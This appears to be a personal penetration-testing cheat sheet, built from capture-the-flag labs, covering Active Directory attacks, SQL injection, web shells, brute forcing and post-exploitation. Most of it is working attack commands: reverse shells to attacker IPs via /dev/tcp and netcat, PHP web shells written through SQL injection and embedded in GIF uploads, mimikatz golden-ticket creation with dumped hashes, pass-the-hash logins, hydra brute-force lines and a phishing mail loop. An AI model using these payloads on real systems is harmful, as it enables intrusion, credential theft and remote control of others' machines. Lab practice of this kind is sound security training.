# PENETRATION TESTING NOTES
pass the hash
- allow to authenticate as user without passwordhttps://www.safetydetectives.com/is-website-secure/?url=http%3A%2F%2F167.99.72.221
-check vulneravility
# WINDOWS CMD TIPS & TRICKS
find
equivalent -dir \s c:\file.txt
findstr /R "something" .
- extract string in file
# FIND COMMANDS
# Find files:
find / -name Kernel.php 2>/dev/null
# Find SUID files:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders
find / -perm -o x -type d 2>/dev/null # world-executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
find / -name perl*
find / -name python*
find / -name gcc*
find / -name c
# SHELL
cat file.txt | grep -v 'Size: 157' (do not show anything that has "Size: 157" in it)
# Fix terminal:
stty size
stty rows <value> cols <value>
# MYSQLI INJECTION
'union select 1, @@version-- -
- to know version of sqli server'union select 1, table_name FROM information_schema.tables-- -
- enumerate tablesUNION SELECT 1, LOAD_FILE('/etc/passwd')-- -
- load files in the serverUNION SELECT 1, 0x3C3F7068702073797374656D28245F524551554553545B27636D64275D293B203F3E INTO OUTFILE '/var/www/html/plsgod.php'-- - -
sqli exfil bypass with hexadecimal
UNION SELECT char(60,104,116,109,108,62,60,98,111,100,121,62,60,112,62,72,105,32,105,116,32,119,111,114,107,115,33,60,47,112,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62), null INTO OUTFILE '/var/www/html/test.html'-- -
- sqli exfil bypass with char() function
# RELATED LINKS
- https://www.websec.ca/kb/sql_injection
# ACTIVE DIRECTORY [AD]
enum4linux
- to enumerate port 139/445 [AD]nbtscan
- enumerate NETBIOS shares [AD]./kerbrute_linux_amd64 userenum -v -d spookysec.local --dc 10.10.21.202 users.txt | grep VALID
- kerbrute exploit kerberos ASREP [AD]impacket
- use to get hashes and more [AD]python3 /opt/impacket/examples/GetNPUsers.py spookysec.local/ -no-pass -usersfile validusers.txt -format hashcat
- no-pass(passthehash) enumerate [AD]python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm/-just-dc 10.10.201.139/backup@10.10.201.139
- dump hash in DC [AD]ruby /opt/evil-winrm/evil-winrm.rb -i 10.10.36.142 -u USER -H 0e0363213e37b94221497260b0bcb4fc
- pass the hash [AD]
# WINDOWS POST-EXPLOITATION
# POWERVIEW
powershell -ep bypass
- bypass the execution policy to run scripts [WPE]. .\PowerView.ps1
- start the powerview script [WPE]Get-NetUser | select cn
- powerview enumerate domain users [WPE]Get-NetGroup -GroupName *admin*
- powerview enumerate domain groups [WPE]Invoke-ShareFinder
- powerview enumerate shared folder [WPE]Get-NetComputer -fulldata | select operatingsystem
- powerview enumerate operatingsystem [WPE]
# BLOODHOUND (active directory mapping)
powershell -ep bypass
- bypassing execution policy. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
- save mapping of the active directory [WPE]
# MIMIKATZ
privilege::debug
- check that mimikats run as administratorlsadump::lsa /patch
- dump all hasheslsapdump::lsa /inject /name:krbtgt
- dump hash and security identifier to create golden ticket
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 5508500012cc005cf7082a9a89ebdfdf
LM :
Hash NTLM: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 5508500012cc005cf7082a9a89ebdfdf
ntlm- 0: 372f405db05d3cafd27f8e6a4a097b2c
kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500
- create golden ticket (id is default admin groupid)misc::cmd
- spawn new shell with elevated privilegesdir \\Desktop-1\c$
- access to another computer in the domain (pivot)
# SUID ENUMERATIONS
find / -perm -u=s -type f 2>/dev/null
- [SUID]
# SAMBA ENUMERATIONS
nmap -p445 --script-enum-shares.nse,smb-enum-users.nse $IP
- enumerates samba sharesnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount $IP
- enumerates mountsmbget -R smb://$IP/
- to get recursively in the sharesshowmount $IP
- to show available mount in serversmbclient \\\\10.10.201.139\\backup -U svc-user
- to enter the sharessmbclient -L 10.10.201.139 -U svc-user
- to list sharessmbmap
# GIT ENUMERATIONS
# HASHES
Aministrator:500:aaa3b435b51404eeaac3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
- NTLM hashhashcat -m 1710 -a 0 hash:salt /usr/share/wordlists/rockyou.txt
- cracking hash with salt
# ZIP FILE CRACKING
7zipcrack
- to crack password of 7zip filefcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt Found.zip
- crack password of 7zip file7z
- open 7zip filefcrackzip -B
- run a benchmarkfcrackzip -v -m zip6 -l 4-8 -u secret.zip
- crack zip file with password length 4-8 charakters
# BINARY EXPLOITATION
hexeditor
- to view binary format and hex format
# FORENSICS [FRS]
- search for wanted strings [FRS]
- we can look onto http stream and then downlod all the activity by exporting into HTTP objects [FRS]
sudo tcpdump -s 0 -i tun0 -w tcpdump.pcap
- to capture traffic [FRS]tshark -r overpass2.pcapng -T fields -e ip.dst | sort | uniq -c
- display ip with most packets [FRS]tshark -r overpass2.pcapng ip.dst==192.168.170.159 | head
- filter by ip [FRS]tshark -r overpass2.pcapng --export-objects "http,http-objects"]
- export HTTP objects [FRS]
# CRYPTOGRAPHY
https://scwf.dima.ninja/
# STEGANOGRAPHY
stegsolve
- image stenography solversteghide (extract) : steghide extract -sf <filename>
(hit enter on passphrase)
# PROFTPD
SITE CPFR $FILE
- copy targeted file into bufferSITE CPTO $DESTINATIONPWD
- mv copied file into destination directory
# MSFVENOM
msfvenom -p windows/shell_reverse_tcp LHOST=10.66.67.22 LPORT=9000 -f exe -o shell.exe
# SMTP
python2 imapgrab.py -l -s sneakycorp.htb -u username-p 'password'
- login to email server [SMTP]python2 imapgrab.py -d -v -M -f ~/Documents/ctf/htb/sneakymailer/backup -s sneakycorp.htb -u paulbyrd -p '^(#J@SkFv2[%KhIxKk(Ju
hqcHl<:Ht' -m 'ALL'` - download mailsevolution
- open email with evolution app
# SMTP COMMANDS
• a LIST "" "*"
• a LIST "" “INBOX/*”
• a STATUS INBOX RECENT
• a select inbox
HELO my.server.com
MAIL FROM:
RCPT TO:
DATA
From: Danny Dolittle
To: Sarah Smith
Subject: Email sample
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUIT
# FTP
- we can upload file using
tftp
# SUBDOMAIN ENUMERATIONS / FUZZING
# WFUZZ
wfuzz -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H 'Host: FUZZ.sneakycorp.htb' --hc 301
ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://sneakycorp.htb -H "Host:FUZZ.sneakycorp.htb"
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.1.202/FUZZ
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
- look for common directorieswfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ.php
- for common fileswfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
- fuzzing parameters in urlwfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://minion.htb/userinfo.php
- fuzzing post requestswfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://minion.htb/FUZZ
- fuzzing cookieswfuzz -z file,wordlist/general/common.txt -b cookie=FUZZ http://minion.htb/
- fuzzing cookies 2wfuzz -z file,wordlist/general/common.txt -H "myheader: headervalue" -H "myheader2: headervalue2" http://minion.htb/FUZZ
- fuzzing custom headerswfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://minion.htb/
- fuzzing http verbswfuzz -z file,wordlist/general/common.txt -p localhost:8080 http://minion.htb/FUZZ
- using proxyswfuzz -z file,wordlist/general/common.txt -p localhost:2222:SOCKS5 http://minion.htb/FUZZ
- using socks proxys
# SCRIPTS
while read email; do swaks --to $email --from security@htb --body "goto http://10.10.14.69" --server sneakycorp.htb;done < email.txt
# BLUETOOTH HACKING
use hcitool scan
l2ping -i hci0 -s 600 -f 39:8C:14:6B:53:2D
//get a shell from webapp or web shell cd /var/tmp && echo '#!/bin/bash' >> test.sh && echo 'bash -i >& /dev/tcp/192.168.60.128/444 0>&1' >> test.sh && chmod 777 test.sh && ./test.sh <?php $cmd=$_GET['cmd']; print('$cmd'); ?> -- > get shells from uploaded image
# REMOTE CODE EXECUTION (RCE)
<?php echo system($_GET['cmd']); ?>
<?php $_GET['param1']($_GET['param2']); ?>
echo "bash -i >& /dev/tcp/10.10.14.17/1234 0>&1" | base64
# Inject code to image or gif:
echo '<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>' >> bad.gif then upload
convert -delay 20 -loop 0 *.jpg example.gif --> convert imge to gif
http://192.168.0.10/imfadministrator/uploads/ad54eabb6fde.gif?cmd=ls -->> ?cmd=ls to use the cmd commands
# LOCAL FILE INCLUSIONS (LFI)
php://filter/convert.base64-encode/resource=config http://172.20.10.3/?page=php://filter/convert.base64-encode/resource=config
# WEBISTE/PAGE VULNERABILITY
check for LFI vulnerabilities due to the ?page=<input>
structure. can use tool kadimus (https://github.com/P0cL4bs/Kadimus)
usage: ./kadimus -u 192.168.246.105/?page=login ---> must be run in the directory. 3rd party tool always in opt
strings filename.jpg{png,bmp,jpg} # Stego
cewl : cewl $ip -w cewl.txt
# HYDRA
# hydra http
hydra -l <username> -P <wordlist> <IP> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid Password"
# hydra smtp attack
hydra -s 25 -v -V -l test@example.com -P /path/to/password/list.lst -t 1 -w 20 -f 192.168.10.5 smtp
# hydra ssh attack
hydra -L users.txt -P passwords.txt ssh://10.10.10.7
hydra <ip address> ssh -vV -L <login list> -P <password list> -e s -t 10
# SQLMAP
sqlmap: When running burp, copy the login or whatever request entirely, paste it to a file and save it as login.req //IMPORTANT
sqlmap -r login.req
sqlmap -u http://192.168.246.105/?page=login –data=”user=user&pass=pass&submit=Login” -puser –dbms mysql –risk=3 –level=3
sqlmap -r capture.txt --dbs --threads 10 --level 5 --risk 3
sqlmap --level 5 --risk 3 --url "http://172.20.10.3/?page=add_value*"
sqlmap -D database --tables --url
sqlmap --dbs -- tables --url
sqlmap --tables -D databasename --url
sqlmap --columns -D databasename -T tablename --url
# SSH
# SSH login with id_rsa:
ssh -i id_rsa username@ip
# Send email with telnet over port 25
telnet ip 25
EHLO or HELO druckkammer.machine.htb <--- the domain does not matter just put something there
VRFY username@localhost <-- optional
mail from:<gillbates@microsucks.com>
rcpt to:<username@localhost>
data
Subject: YOU GOT OWNED <-- example
MESSAGE OR SHELL CODE HERE!
# LUA RCE
/weather/forecast?city=London')%3bos.execute("rm++/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.69+9001+>/tmp/f")--
- unsanitized input lead to lua execution
# GPG ENCRYPT / DECRYPT
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/idk.gz
- decrypt gpg encryption